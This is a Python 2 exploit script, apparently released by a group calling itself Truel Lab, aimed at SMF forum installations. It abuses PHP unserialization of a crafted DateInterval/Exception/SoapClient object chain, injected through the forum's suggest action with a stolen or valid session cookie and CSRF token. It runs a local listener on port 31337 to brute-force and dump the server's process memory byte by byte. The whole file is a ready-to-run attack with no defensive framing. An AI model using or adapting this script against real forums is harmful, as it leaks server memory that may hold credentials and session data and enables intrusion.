still hate python

1. import sys, requests, time, os, socket, thread, base64, string, urllib
2. from multiprocessing import Process
3.  
4. #Payload Config
5. bytes_num = 000 #num of bytes to dump
6. address = 000 #starting memory address
7.  
8. #Target Config
9. cookie = {'PHPSESSID' : '000'} #SMF session cookie
10. target_host = 'http://forum/forum/index.php' #URL of target installation index.php
11. csrftoken = ''
12.  
13. #Local Server Config
14. host = "localhost"
15. port = 31337
16.  
17. #Memory dump variables
18. dumped = ''
19. current_dump = ''
20. in_string = False
21. brute_index = 0
22. brute_list = list(string.ascii_letters + string.digits)
23. r_ok = 'HTTP/1.0 200 OK' + '\n'
24. r_re = 'HTTP/1.0 302 OK' + '\n'
25. r_body = '''Server: Truel-Server
26. Content-Type: text/xml
27. Connection: keep-alive
28. Content-Length: 395
29.  
30. <env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
31. <env:Header>
32.  <n:alertcontrol xmlns:n="http://example.org/alertcontrol">
33.   <n:priority>1</n:priority>
34.   <n:expires>2001-06-22T14:00:00-05:00</n:expires>
35.  </n:alertcontrol>
36. </env:Header>
37. <env:Body>
38.  <m:alert xmlns:m="http://example.org/alert">
39.   <m:msg>Truel</m:msg>
40.  </m:alert>
41. </env:Body>
42. </env:Envelope>'''
43.  
44.  
45. def serverStart():
46.     print "[+] Setting up local server on port " + str(port)
47.     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
48.     sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
49.     if not sock:
50.         print "[X] Fatal Error: Unable to create socket"
51.     sock.bind((host, port))
52.     sock.listen(1)
53.     return sock
54.  
55. def getToken():
56.     global csrftoken
57.     print "[+] Trying to get a valid CSRF token"
58.     for n in range(3): #3 attempts
59.         r = requests.get(target_host, cookies=cookie, allow_redirects=False)
60.         r = r.text
61.         if(r.find("action=logout;")!=-1):
62.             break
63.     start = r.find("action=logout;")
64.     if (start !=-1):
65.         end = (r[start+14:]).find('">')
66.         csrftoken = r[start+14 : start+end+14]
67.         print "[+] Authentication done. Got token " + str(csrftoken)
68.         return True
69.     else:
70.         print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
71.         return False
72.  
73. def prepareForExploit():
74.     if not(getToken()): #get CSRF token
75.         os._exit(1)
76.     target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
77.     r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request
78.     return
79.  
80. def forgePayload(current_try, address):
81.     location = "http://" + current_try
82.     payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'
83.     return payload
84.  
85. def sendPayload(payload,null):
86.     target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens
87.     try:
88.         r = requests.get(target, cookies=cookie, allow_redirects=False)
89.     except requests.exceptions.RequestException:    
90.         print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
91.         os._exit(1)
92.     return
93.  
94. def limitReached(dumped):
95.     if(len(dumped) >= bytes_num):
96.         return True
97.     else:
98.         return False
99.  
100. def printDumped(dumped):
101.     d = "    "
102.     cnt = 1
103.     print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
104.     print "[+] ======================= Dumped Data ======================="
105.     for i in range(bytes_num):
106.         d = d + str(dumped[i])
107.         if (cnt % 48 == 0):
108.             print d
109.             d = "    "
110.         if (cnt == bytes_num):
111.             print d
112.         cnt = cnt + 1
113.  
114. def getSoapRequest(sock):
115.     connection, sender = sock.accept()
116.     request = connection.recv(8192)
117.     return (connection, request)
118.  
119. def sendSoapResponse(connection, content):
120.     connection.send(content)
121.     connection.close()
122.     return
123.  
124. def getDumpedFromHost(request):
125.     i = request.find("Host: ") + 6
126.     v = request[i:i+1]
127.     return v
128.  
129. def pushDumped(value, string):
130.     global dumped
131.     global current_dump
132.     global brute_index
133.     global address
134.     global in_string
135.  
136.     dumped = str(value) + str(dumped)
137.     if(string):
138.         current_dump = str(value) + str(current_dump)
139.     else:
140.         current_dump = ""
141.     in_string = string
142.     address = address-1
143.     brute_index = 0
144.     print "[" + hex(address) + "] " + str(value)
145.     return
146.  
147. def bruteViaResponse(sock):
148.     global brute_index
149.     current_try = ""
150.     response_ok = r_ok + r_body
151.  
152.     for n in range(19):
153.         connection, request = getSoapRequest(sock)
154.         if not request:
155.             connection.close()
156.             return False
157.         if request.find("owned")!=-1:
158.             pushDumped(getDumpedFromHost(request), True)
159.             sendSoapResponse(connection,response_ok)
160.             return True
161.         else:
162.             if((brute_index+1) == len(brute_list)):
163.                 sendSoapResponse(connection,response_ok)
164.                 return False
165.             brute_index = brute_index + 1
166.         if not in_string:
167.             current_try = brute_list[brute_index]
168.         else:
169.             current_try = brute_list[brute_index] + str(current_dump)
170.         response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
171.         sendSoapResponse(connection,response_re)
172.     connection, request = getSoapRequest(sock)
173.     if request.find("owned")!=-1:
174.         pushDumped(getDumpedFromHost(request), True)
175.         sendSoapResponse(connection,response_ok)
176.         return True
177.     sendSoapResponse(connection,response_ok)
178.     return False
179.  
180. def bruteViaRequest(sock):
181.     global brute_index
182.     brute_index = 0
183.     current_try = ""
184.  
185.     while(True):    
186.         if(brute_index == len(brute_list)):
187.             pushDumped(".", False)
188.         if limitReached(dumped):
189.             printDumped(dumped)
190.             return
191.         if not in_string:
192.             current_try = brute_list[brute_index]
193.         else:
194.             current_try = brute_list[brute_index] + str(current_dump)
195.         payload = forgePayload(current_try,address)
196.         thread.start_new_thread(sendPayload,(payload,""))
197.         if not bruteViaResponse(sock):
198.             brute_index = brute_index + 1
199.     return
200.  
201. def runExploit():
202.     print "[+] Starting exploit"
203.     sock = serverStart()
204.     prepareForExploit()
205.     print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
206.     bruteViaRequest(sock)
207.     sock.close()
208.     print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
209.     sys.exit(0)
210.  
211.  
212. runExploit()